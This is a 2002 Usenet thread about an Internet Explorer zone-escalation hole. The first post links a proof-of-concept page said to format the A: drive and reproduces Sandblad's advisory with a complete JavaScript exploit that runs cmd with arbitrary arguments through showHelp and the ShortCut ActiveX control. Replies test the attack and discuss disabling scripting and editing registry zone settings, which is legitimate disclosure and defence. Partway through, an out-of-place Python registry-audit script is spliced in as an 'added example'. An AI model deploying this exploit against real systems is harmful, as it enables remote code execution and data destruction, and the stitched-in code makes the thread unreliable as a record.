
DANGEROUS new security hole


Sugien
Nov 10, 2002, 12:18:26 AM
#<--! Flame resistant undies engages

http://www.dino-soft.org/auto.html

The above url when viewed WILL FORMAT THE A:\ drive when viewed on a
fully updated and patched Windows system. If you go there make sure there
is nothing in the A:\ that formatting will harm; because this has been
tested and works on Windows 2000, WinXP home/corp/pro, Win98/SE.
This is a harmless POC to give you experts here a heads up; because
Microsoft HAS been informed of the hole; but they seem to be sitting on
their hands, maybe much like the recent XP hole that they knew about before
XP even shipped; but chose to wait until SP1 to correct.
This is VERY DANGEROUS, and this little harmless POC could quite
easily be made to be quite nasty; but when the author of the original hole,
whose hole I have sort of legoised<s> and made to work a very little bit
differently, contacted them, Microsoft had this to say to the original author:

"Microsoft was initially contacted 2002-10-04. After several mail exchanges,
their final response was that the technique used to run programs with
parameters from the "Local computer zone" was no security vulnerability. A
fix should instead be applied for all possibilities for content in the
"Internet zone" to access the "Local computer zone"."

Further down I have included the original author's paper on this. As I said in
another post I will try very hard to give original authors any and all credit
they deserve and I can think of no better way than to include the original
work from which I created my sort of bastardized lego creation<vbfg>.
Anyway, as I also said earlier the "professionals" here can maybe get
Microsoft off their collective arses and do something about this; because if
a mediocre lego code programmer like me can figure out from his paper how to
do this then every script kiddy out there can also access the script from
the known location online where I got it from:


ENJOY:

<--begin original by author whose name is included in his work below-->

Title: "How to execute programs with parameters in IE"
Date: [2002-11-06]
Software: Internet Explorer (webbrowser control)
Vendor: http://www.microsoft.com/
Impact: Javascript in "Internet zone" may execute programs with parameters
Author: Andreas Sandblad, sand...@acc.umu.se
                                                          _ _
                                                     o' \,=./ `o
                                                         (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

TABLE OF CONTENTS:
==================
Introduction ................................................. 1
Vendor status ................................................ 2
Details ...................................................... 3
Exploit ...................................................... 4
Disclaimer ................................................... 5
Feedback ..................................................... 6


(1) INTRODUCTION:
=================
By default all internet contents such as homepages are placed in the
"Internet zone". Local content viewed in IE runs in the "Local computer
zone" with less restrictions.

In the past we have seen many vulnerabilities where script in the
"Internet zone" could access the "Local computer zone". The script could
do actions like:
- Read local files if the exact path is known and file can be opened by
  IE.
- Execute local programs (exact path required) WITHOUT parameters using
  the codebase attack.

It will be shown in this document how script in the "Local computer zone"
can actually be designed to run arbitrary programs WITH parameters (exact
path not needed). The technique used may open up far more dangerous
attacks than seen before.


(2) VENDOR STATUS:
==================

(3) DETAILS:
============
Javascript can use the showHelp command to do one of the following two
operations:
1. Open a local compiled help file (.chm) in a separate winhelp window.
2. Open an url (must begin with http://) in a separate winhelp window.
Script in window opened as (1) may use the shortcut command (activeX
control) to run programs with parameters, but (2) may not. Nothing
strange, normal security restrictions.

After some investigations I found a way to make (2) use the shortcut
command. The following must be done:
3. Script in (2) gets access to the "Local computer zone".
4. Script in (2) changes url to "mk:@MSITStore:C:" or similar.
5. A local compiled help file must have been opened since IE was first
started. Any help file will do. For example showHelp("iexplore.chm").

In order to achieve (3) there are several nonpatched "cross site/zone
scripting" vulnerabilities to use. To achieve (4) a new window must be
created from (2). By using the "opener" object it is possible to keep
control of the winhelp window (2) even after the url is changed. (5) is
trivial to achieve and will not affect the winhelp window for (2), since
it is opened in a different window by default.

Before MS02-055 was released by Microsoft the above was a lot easier
to perform. (3) and (4) could then be skipped.


(4) EXPLOIT:
============
The exploit uses a nonpatched "cross site/zone scripting" vulnerability
published by Liu Die Yu 2002-10-01 to Bugtraq:
http://online.securityfocus.com/archive/1/293692
It could also be possible to use one of the many "cross site/zone
scripting" vulnerabilities Greymagic found:
http://sec.greymagic.com/adv/gm012-ie/
Recently I reported a new "cross site/zone scripting" vulnerability to
Microsoft that could also be used. But since no patch is yet produced,
information about it will not be published.

In order not to have to put script in 3 separate files I have combined
them into one single file. The script will check for text after the #
sign in the url to determine what to perform (url's hash). If your computer
is heavily loaded, then the value of the setTimeout timer has to be
increased. The timer is needed because the "mk:@MSITStore:C:" url is not
set directly by IE.

INSTRUCTIONS:
1. Copy the content below and place it in a html file.
2. REMOVE THE * FROM THE SCRIPT TAG.
3. Place the file on a remote webserver and load it in IE (URL MUST START
WITH HTTP://).
4. The script will open up a dos window and display a line of text, create
the file c:/vulnerable.txt (write permission required) and start winmine
(this excellent game must exist). The help window for IE will not be
closed.

TESTED:
Win2000 pro, XP, IE 6 Win98/SE (latest patches).

--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sand...@acc.umu.se
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';

if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>


--
http://www.dino-soft.org
/}
@###{ ]::::::Dino-Soft Software::::::>
\}
http://home.adelphia.net/~dinosoft/online2.html


D McAuliffe
Nov 10, 2002, 7:03:50 AM
Didn't work on my system (home user -W98SE - IE5.5 - updated). Perhaps it
was due to my Local Zone settings being the same as those in the Restricted
Zone.

--

~~~~~~~~~~~~~~~~~
Dave McAuliffe
<Central Mass.> USA
Remove X from address
~~~~~~~~~~~~~~~~~

"Sugien" <dino...@adelphia.net> wrote in message
news:C_lz9.46631$Lg2.13...@news2.news.adelphia.net...


> #<--! Flame resistant undies engages
>
> http://www.dino-soft.org/auto.html
>
> The above url when viewed WILL FORMAT THE A:\ drive when viewed on a
> fully updated and patched windows system. If you go there make sure there
> is nothing in the A:\ that formatting will harm; because this has been
> tested
> and works on Windows 2000 WinXP/home/corp/pro Win98/SE.

<snip>


Wessel
Nov 10, 2002, 8:09:58 AM

"D McAuliffe" <Dav...@emailX.com> wrote in message
news:aqlhv2$ask8h$1...@ID-37006.news.dfncis.de...

> Didn't work on my system (home user -W98SE - IE5.5 - updated). Perhaps it
> was due to my Local Zone settings being the same as those in the
> Restricted Zone.
>
> --
That is a very good idea for home users.
Don't know if this would work for me at work, since I have a local server
running and use serverside scripting as well as client side.
But local zone settings as restricted zone could give protection against hta
files that sneak by. ;-)

Regards Wessel

xyZed
Nov 10, 2002, 10:18:48 AM
There is circumstantial evidence that on Sun, 10 Nov 2002 05:18:26
GMT, "Sugien" <dino...@adelphia.net> wrote
_______________________________________________________

> #<--! Flame resistant undies engages
>
> http://www.dino-soft.org/auto.html
>

Wasn't this fixed by M$ 5 months back?
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-037.asp
--

It's a cruel world we live in. A man's lucky if he gets out alive.

www.washerhelp.com [remove mymask_ to email]

Wessel
Nov 10, 2002, 11:20:59 AM

"xyZed" <mymask...@blueyonder.co.uk> wrote in message
news:rutssuk1vgkl7ksii...@4ax.com...

> There is circumstantial evidence that on Sun, 10 Nov 2002 05:18:26
> GMT, "Sugien" <dino...@adelphia.net> wrote
> _______________________________________________________
>
> >> #<--! Flame resistant undies engages
> >>
> >> http://www.dino-soft.org/auto.html
> >>
> >
>
> Wasn't this fixed by M$ 5 months back?
> http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-037.asp
> --
Then why is it working on IE5.5 SP2?
MS claims that it is not affected.
And on downloading it, it says that the computer already has a newer
version.

HTH Wessel

bassbag
Nov 10, 2002, 11:34:25 AM
In article <C_lz9.46631$Lg2.13...@news2.news.adelphia.net>,
dino...@adelphia.net says...

When I click that url I get a blank page apart from "testing ie execute
exploit" and an IE script error. The error being...
object doesn't support this property or method.. and nothing happens. Using
IE6, W98SE
me

Bart Bailey
Nov 10, 2002, 12:25:48 PM
Sugien wrote:

> #<--! Flame resistant undies engages
>
> http://www.dino-soft.org/auto.html
>
> The above url when viewed WILL FORMAT THE A:\ drive when viewed on a
> fully updated and patched windows system. If you go there make sure there
> is nothing in the A:\ that formatting will harm; because this has been
> tested
> and works on Windows 2000 WinXP/home/corp/pro Win98/SE.

Win95b with either Opera or Netscape isn't affected at all.

> This is a harmless POC to give you experts here a heads up; because
> Microsoft HAS been informed of the hole; but they seam to be sitting on
> there hands maybe much like the recient XP hole that they knew about before
> XP even shipped; but chose to wait until SP1 to correct.
> This is VERY DANGEROUS, and this little harmless POC could quite
> easley be made to be quite nasty; but when the author of the original hole
> whos' hole I have sort of legoised<s> and made to work a very little bit
> differently Microsoft had this to say to the original author:

I suppose if I were using MSIE,
and had it configured for the most vulnerable behavior,
I would get something besides:
"Testing IE Execute Exploit"

Sugien
Nov 10, 2002, 1:56:39 PM

"xyZed" <mymask...@blueyonder.co.uk> wrote in message
news:rutssuk1vgkl7ksii...@4ax.com...

Not this incarnation, my test machine is probably kept more up to date than
my main system and on my test system with all the latest patches and service
packs and critical updates it still worked.

Sugien
Nov 10, 2002, 1:59:41 PM

"Bart Bailey" <bar...@nethere.net> wrote in message
news:3DCE969C...@sbcglobal.net...

I have only tested it on IE and it works here with all of the latest
security patches and service packs, but I do have the security set to
default because of course if you turn off JavaScript it won't work; but the
point is that at a default security setting it does work; because most all
normal users have their IE set to default settings; because most are afraid
to monkey around with it thinking they will mess it up and that it will cost
them big bucks to get it fixed.

Tim Downie
Nov 10, 2002, 4:53:19 PM
Sugien wrote:
> "xyZed" <mymask...@blueyonder.co.uk> wrote in message
> news:rutssuk1vgkl7ksii...@4ax.com...
>> There is circumstantial evidence that on Sun, 10 Nov 2002 05:18:26
>> GMT, "Sugien" <dino...@adelphia.net> wrote
>> _______________________________________________________
>>
>>>> #<--! Flame resistant undies engages
>>>>
>>>> http://www.dino-soft.org/auto.html
>>>>
>>>
>>
>> Wasn't this fixed by M$ 5 months back?
>> http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-037.asp
>> --
>>
>> It's a cruel world we live in. A man's lucky if he gets out alive.
>>
>> www.washerhelp.com [remove mymask_ to email]
>
> Not this incarnation, my test machine is probably kept more up to
> date then my main system and on my test system with all the latest
> patches and service packs and critical updates it still worked.

On my machine, (IE6, 98se, all service packs and security updates) it
merrily formats the A drive. Worrying.

Tim


---
Outgoing mail is certified as probably virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.417 / Virus Database: 233 - Release Date: 08/11/02

Sugien
Nov 10, 2002, 5:16:30 PM

"Tim Downie" <timdow...@yahoo.co.uk> wrote in message
news:aqmkpf$bmvh1$1...@ID-81538.news.dfncis.de...

Right now the best fix is to either set JavaScript to prompt or to disable
it altogether or set all the internet to the restricted zone.

Nick FitzGerald
Nov 10, 2002, 7:11:09 PM
"xyZed" <mymask...@blueyonder.co.uk> wrote:


NO.

This newer vulnerability is readily exploited in IE 6.0 and 6.0SP1.

The bug the help file execution exploit took advantage of is long
fixed and essentially unrelated to this one. Read the Sandblad
advisory for the details of the "problem" here.


--
Nick FitzGerald


Nick FitzGerald
Nov 10, 2002, 7:22:28 PM
"Bart Bailey" <bar...@nethere.net> wrote:

> Win95b with either Opera or Netscape isn't affected at all.

Not exactly surprising given it is explicitly an IE security model
exploit... Did you not read the Sandblad advisory?

> I suppose if I were using MSIE,
> and had it configured for the most vulnerable behavior,
> I would get something besides:
> "Testing IE Execute Exploit"

Not "most vulnerable" -- default.

All it depends on is JavaScript being enabled and the fundamental
brokenness of the (implementation of the) IE security model.

Yes folks -- if you use IE you _must_, at a minimum, disable
scripting in the Internet security zone. All those annoying popup
advertising scum who in the past used Scriptlet/TypeLib then the
Java exception exploit to change your IE favourites/Start Page/
Search Page/etc or to install their scummy spyware and/or adware
will now be rolling this into their arsenals as it is the first
easy remote arbitrary code exploit for IE 6.0...

Expect MS to patch this within -- oh, at least 6 months...


--
Nick FitzGerald


Nick FitzGerald
Nov 10, 2002, 7:04:02 PM
"D McAuliffe" <Dav...@emailX.com> wrote:

> Didn't work on my system (home user -W98SE - IE5.5 - updated). Perhaps it
> was due to my Local Zone settings being the same as those in the Restricted
> Zone.

The "Local Intranet" zone is irrelevant to this issue. The "Local
Computer" zone referred to in Sandblad's advisory is really the "My
Computer" security zone and means "files on the local system or
accessible via mapped drives _that are not in the 'special' folders
that represent (cached) Internet content_". There is no user
interface to the "Local Computer" security zone (which is correctly
known as the "My Computer" zone) in IE -- the only way you can see
or modify its settings is through careful use of the Registry
Editor. Look under:

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

Note that there are _five_ entries -- in the keys named 0 - 4.
The first of those has the DisplayName value of "My Computer" and
the Description value of "Your computer".

I think I've heard of a couple of third-party tools that provide a
graphical interface to show the settings for this "hidden" security
zone, but I've not searched them out or tried them.

Finally, I think the exploit depends on some peculiarity of the IE
security model that is specific to IE 6.0 but again have not looked
that closely at its version dependencies. If so, it not working in
IE 5.5 would be "expected".


--
Nick FitzGerald


Nick FitzGerald
Nov 10, 2002, 7:33:37 PM
"bassbag" <bas...@bodybags.dragon.wales> wrote:

> When i click that url i get ablank page apart from "testing ie execute
> exploit" and an ie script error.The error being...
> object doesnt support this property or method..and nothing happens.Using
> ie6 ,w98se

Even if you set the security zones back to defaults?


--
Nick FitzGerald


bassbag
Nov 10, 2002, 7:09:40 PM
In article <aqmkpf$bmvh1$1...@ID-81538.news.dfncis.de>, timdownie2000@yahoo.co.uk says...
Setting internet zone under custom level to disable or prompt for most of
the settings is sufficient to stop 99 % of vulnerabilities.
me

FromTheRafters
Nov 10, 2002, 11:08:11 PM

"Nick FitzGerald" <ni...@virus-l.demon.co.uk> wrote in message
news:3dce...@clear.net.nz...

> Yes folks -- if you use IE you _must_, at a minimum, disable
> scripting in the Internet security zone. All those annoying popup
> advertising scum who in the past used Scriptlet/TypeLib then the
> Java exception exploit to change your IE favourites/Start Page/
> Search Page/etc or to install their scummy spyware and/or adware
> will now be rolling this into their arsenals as it is the first
> easy remote arbitrary code exploit for IE 6.0...
>
> Expect MS to patch this within -- oh, at least 6 months...

Hmmm....you're being a little conservative with your estimate
huh Nick!?


Sugien
Nov 10, 2002, 11:22:12 PM

"FromTheRafters" <!00...@nomad.fake> wrote in message
news:usubcl3...@corp.supernews.com...

M$ will probably wait until they collect up all the workarounds and serial
numbers that have been put out that bypass the SP1 fix for the bogus XP pro
CDs that used that same pirated CD key. That is why they waited to put out
the SP in the first place, so that they could also include the zapper for all
the pirated XP CDs using that number, and they were trying to wait to see if
any other CD keys showed up so they could be blacklisted. You can probably
expect that latest fix to get zapped in their next SP. I would not even put
it past M$ to put in another hole in the SP knowing they could *claim*
to fix it later and along with that fix the workarounds people found to
their last pir8ted CD key zapper.

Bart Bailey
Nov 11, 2002, 4:02:45 AM
Nick FitzGerald wrote:

> "Bart Bailey" <bar...@nethere.net> wrote:
>
> > Win95b with either Opera or Netscape isn't affected at all.
>
> Not exactly surprising given it is explicitly an IE security model
> exploit... Did you not read the Sandblad advisory?

Nah, since the IE requirement wasn't stated,
I just clicked at it with all my browsers;
Netscape - v4.08
Opera - v6.05
Off-By-One - v3.2.J.2

>
> > I suppose if I were using MSIE,
> > and had it configured for the most vulnerable behavior,
> > I would get something besides:
> > "Testing IE Execute Exploit"
>
> Not "most vulnerable" -- default.

Is there a more vulnerable IE config than the default? <g>

> All it depends on is JavaScript being enabled and the fundamental
> brokenness of the (implementation of the) IE security model.

If you're gonna ride bareback with JavaScript, and everything else,
enabled, then might as well open file sharing with root access to C:\,
and see what a thrill the internet can be ;-)

bassbag
Nov 11, 2002, 11:45:10 AM
In article <3dce...@clear.net.nz>, ni...@virus-l.demon.co.uk says...
Yes, I get the same script errors when settings are at lowest security
levels, and the blank screen apart from the testing IE exploit title. I
also get a Windows help file opening. I use scriptrap, but it doesn't seem
to be that affecting it as it would open otherwise. Also firewall is not
blocking anything. Very strange. I'm using myie although that uses the IE
engine so I wouldn't have thought it's that.
me

Nick FitzGerald
Nov 11, 2002, 5:17:51 PM
"bassbag" <bas...@bodybags.dragon.wales> wrote:

> Yes ..i get the same script errors when settings are at lowest security
> levels , and the blank screen apart from the testing ie exploit title.I
> also get a windows help file opening.I use scriptrap , but it doesnt seem
> to be that affecting it as it would open otherwise.Also firewall is not
> blocking anything.Very strange.Im using myie although that uses the IE
> engine so i wouldnt have thought its that.

It turns out, according to the author of the exploit Soooooge based
"his" PoC on, that there are some more complex timing dependencies in
this exploit than originally thought. As I'd already seen the exploit
work in other pages that were only trivially different from Soooooge's
(they all have exactly the same scripting, just different values for
the "prog" and "args" variables) I hadn't actually tried Soooooge's.

On trying it on this machine, where two other basically identical PoC
pages worked fine, Soooooge's didn't work.

So, for whatever reason, it may not work on some others' machines
either, just as at least one of the other PoC pages for this exploit
that does work on my machine is reported by many to not work.

The latest post by the author of the original PoC is linked below,
for those interested:

http://online.securityfocus.com/archive/1/299230


--
Nick FitzGerald


D McAuliffe
Nov 12, 2002, 6:56:18 AM

"Nick FitzGerald" <ni...@virus-l.demon.co.uk> wrote in message
news:3dce...@clear.net.nz...

Thanks for the direction. After finding an explanation for the zone
settings at:
http://support.microsoft.com/default.aspx?scid=KB;en-us;q182569
I did a spreadsheet on my system's settings and noticed and ask help with:
1) Zone 0's 1C00 (Java permissions) is displaying in hex/decimal not
binary. Do you recommend deleting then adding it back? My Zone 3 had a
similar problem, but was corrected through an Internet Properties change.
2) Zone 0's Flag is set at 33. If it were changed to 1, would the Zone
then appear in the Internet Properties window? (I'm assuming that 33 = 1+32
of the Flag values)
3) Zone 0, with few exceptions, is set to allow. If, for example, I
changed 1802 (Drag and Drop) to 3 (Disallow), would it mean I couldn't do
that function in Windows Explorer?
I don't have a test computer and am not overly adventurous.
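The Zones registry layout Nick describes earlier in the thread, and the Flags = 1+32 and 1C00 DWORD-versus-binary questions in this post, can be checked mechanically. The following is an added example, not code from anyone in the thread: it parses a constructed regedit export of the Zones key, decodes DWORD and REG_BINARY values alike, names the Flags bits, and reports hidden zones and Active scripting (1400) left enabled in the Internet zone. The Flags bit names other than 1 and 32, and the 1C00 Java permission encodings, are assumed from KB182569 (the article linked above) rather than from the thread.

```python
import re

# Constructed sample of a regedit export of the Zones key, modelled on the
# five zones 0-4 the thread describes (only 0, 3 and 4 included). Zone 0 is
# the hidden "My Computer" zone with Flags 33 = 1 + 32; its 1C00 value is a
# DWORD while zone 3 stores it as REG_BINARY, the mismatch D McAuliffe saw.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"DisplayName"="My Computer"
"Flags"=dword:00000021
"1400"=dword:00000000
"1802"=dword:00000000
"1C00"=dword:00030000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"DisplayName"="Internet"
"Flags"=dword:00000001
"1400"=dword:00000000
"1802"=dword:00000001
"1C00"=hex:00,00,02,00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"DisplayName"="Restricted sites"
"Flags"=dword:00000003
"1400"=dword:00000003
"1802"=dword:00000003
"1C00"=dword:00000000
'''
ZONE_KEY = re.compile(r'^\[.*\\Internet Settings\\Zones\\(\d+)\]$')
VALUE_LINE = re.compile(r'^"([^"]+)"=(.*)$')

# Flags bits as listed in KB182569 (assumed from that article; the thread itself
# only establishes 1 and 32, since changing Flags from 33 to 1 un-hid zone 0).
FLAG_BITS = {1: 'custom settings may be changed', 2: 'users may add sites',
             4: 'added sites must use https', 8: 'includes sites bypassing the proxy',
             16: 'includes sites not in other zones', 32: 'HIDDEN from Internet Properties',
             64: 'shows the server-verification box', 128: 'treats UNC paths as intranet'}
# Per-action policy values (1400 = Active scripting, 1802 = Drag and drop, ...).
POLICY = {0: 'enable', 1: 'prompt', 3: 'disable'}
# Java permissions (1C00); numeric encodings assumed from KB182569.
JAVA = {0x0: 'disabled', 0x10000: 'high safety', 0x20000: 'medium safety',
        0x30000: 'low safety', 0x800000: 'custom'}

def parse_reg_value(raw):
    """Decode "string", dword:XXXXXXXX or hex:aa,bb,cc,dd to str or int. REG_BINARY
    is exported little-endian, so hex:00,00,02,00 is the same number as dword:00020000."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    if raw.startswith('dword:'):
        return int(raw[len('dword:'):], 16)
    if raw.startswith('hex:'):
        data = bytes(int(b, 16) for b in raw[len('hex:'):].split(',') if b)
        return int.from_bytes(data, 'little')
    raise ValueError(f'unsupported value syntax: {raw}')

def parse_zones(text):
    """Map zone number -> {value name: decoded value} for every Zones\\N key."""
    zones, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        key = ZONE_KEY.match(line)
        if key:
            current = zones.setdefault(int(key.group(1)), {})
            continue
        val = VALUE_LINE.match(line)
        if val and current is not None:
            current[val.group(1)] = parse_reg_value(val.group(2))
    return zones

def decode_flags(flags):
    """Names of the bits set in a zone's Flags value (33 -> bits 1 and 32)."""
    return [name for bit, name in FLAG_BITS.items() if flags & bit]

def audit(zones):
    """Per-zone findings: hidden zones, and Active scripting still enabled in zone 3
    (Internet), the setting the thread advises changing to prompt or disable."""
    report = {}
    for num, values in sorted(zones.items()):
        findings = []
        if values.get('Flags', 0) & 32:
            findings.append('hidden zone (Flags bit 32); editable only via the registry')
        if num == 3 and POLICY.get(values.get('1400')) == 'enable':
            findings.append('Active scripting (1400) is enabled in the Internet zone')
        report[num] = findings
    return report
```

To audit a real machine, feed the text of a `regedit /e` export of the Zones key to `parse_zones` in place of the constructed sample; `audit` then flags zone 0 as hidden and zone 3 if scripting is still enabled.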

Art S
Nov 12, 2002, 12:35:25 PM

"Sugien" <dino...@adelphia.net> wrote in message
news:x0yz9.46856$Lg2.13...@news2.news.adelphia.net...

Interesting.

I just ran it on my system (XP Home, I.E. 6) and said yes whenever I
was asked if I would allow a script (3 times).

I got a DOS window that has an invalid parameter - /autotest. The file
on my diskette is untouched.

Art


Nick FitzGerald
Nov 13, 2002, 4:44:04 AM
"D McAuliffe" <Dav...@emailX.com> wrote:

> Thanks for the direction. ...

You're welcome...

> ... After finding an explanation for the zone

...and thanks back for that link (I thought I had it bookmarked but
couldn't find it last night when writing my previous message...).

> I did a spreadsheet on my system's settings and noticed and ask help with:
> 1) Zone 0's 1C00 (Java permissions) is displaying in hex/decimal not
> binary. Do you recommend deleting then adding it back? My Zone 3 had a
> similar problem, but was corrected through an Internet Properties change.

Not sure. On two pre-IE60 machines here, all the non-string values
in all zones are of DWORD type, but on this laptop with IE60, as you
report, have zones 0 and 4 with the Java permissions value as a
DWORD but as a binary in all others...

> 2) Zone 0's Flag is set at 33. If it were changed to 1, would the Zone
> then appear in the Internet Properties window? (I'm assuming that 33 = 1+32
> of the Flag values)

The math is correct and you are interpreting the Q-article as I do
but I've not tried it.

> 3) Zone 0, with few exceptions, is set to allow. If, for example, I
> changed 1802 (Drag and Drop) to 3 (Disallow), would it mean I couldn't do
> that function in Windows Explorer?

Dunno...

> I don't have a test computer and am not overly adventurous.

Hey -- the worst that could happen is you stop drag'n'drop working
until you change the value back (and maybe reboot)... The trick is
to not change lots of things at once.


--
Nick FitzGerald


Nick FitzGerald
Nov 13, 2002, 4:56:55 AM
"Art S" <theDabbl...@att.net> wrote:

> Interesting.
>
> I just ran it on my system (XP Home, I.E. 6) and said yes whenever I
> was asked if I would allow a script (3 times.).

Living dangerously there Art! 8-)

> I got a DOS window that has an invalid parameter - /autotest. The file
> on my diskette is untouched.

The format.com with NT-based OSes does not support that switch.

I suggest that you try one of the sample PoC exploits of this
vulnerability specifically designed for Win2K/XP use, such as the
one linked from the Sandblad post I linked in an earlier message
in this thread if having a command prompt pop open before your
eyes is not enough proof of the vulnerability's existence.


--
Nick FitzGerald


Antikillfile
Nov 13, 2002, 7:26:01 AM
It worked on my system. This has to be reported to Microsoft.


Art S
Nov 13, 2002, 10:05:26 AM

"Nick FitzGerald" <ni...@virus-l.demon.co.uk> wrote in message news:3dd221e8$1...@clear.net.nz...
Ah - Sugien's original post said that it had been demonstrated
on Win XP. Perhaps he meant the security hole, and not this
specific demonstration.

I suppose once you demonstrate that you can get a command
prompt invoked, 95% of the security hole has been demonstrated -
the rest is just taking advantage of it.

Art S.


D McAuliffe
Nov 13, 2002, 6:40:24 PM

"Nick FitzGerald" <ni...@virus-l.demon.co.uk> wrote in message
news:3dd2...@clear.net.nz...

Took your advice on #s 2 & 3, but 1 I'll leave alone.

> > 1) Zone 0's 1C00 (Java permissions) is displaying in hex/decimal not
> > binary. Do you recommend deleting then adding it back? My Zone 3 had a
> > similar problem, but was corrected through an Internet Properties change.
>
> Not sure. On two pre-IE60 machines here, all the non-string values
> in all zones are of DWORD type, but on this laptop with IE60, as you
> report, have zones 0 and 4 with the Java permissions value as a
> DWORD but as a binary in all others...
>
> > 2) Zone 0's Flag is set at 33. If it were changed to 1, would the Zone
> > then appear in the Internet Properties window? (I'm assuming that 33 = 1+32
> > of the Flag values)
>
> The math is correct and you are interpreting the Q-article as I do
> but I've not tried it.

Changed the Flag to 1, now the "hidden zone" appears with the rest of the
zones.

> > 3) Zone 0, with few exceptions, is set to allow. If, for example, I
> > changed 1802 (Drag and Drop) to 3 (Disallow), would it mean I couldn't do
> > that function in Windows Explorer?
>
> Dunno...
>
> > I don't have a test computer and am not overly adventurous.
>
> Hey -- the worst that could happen is you stop drag'n'drop working
> until you change the value back (and maybe reboot)... The trick is
> to not change lots of things at once.

And that's exactly what happened. It stopped working, and wouldn't work
again until a reboot.
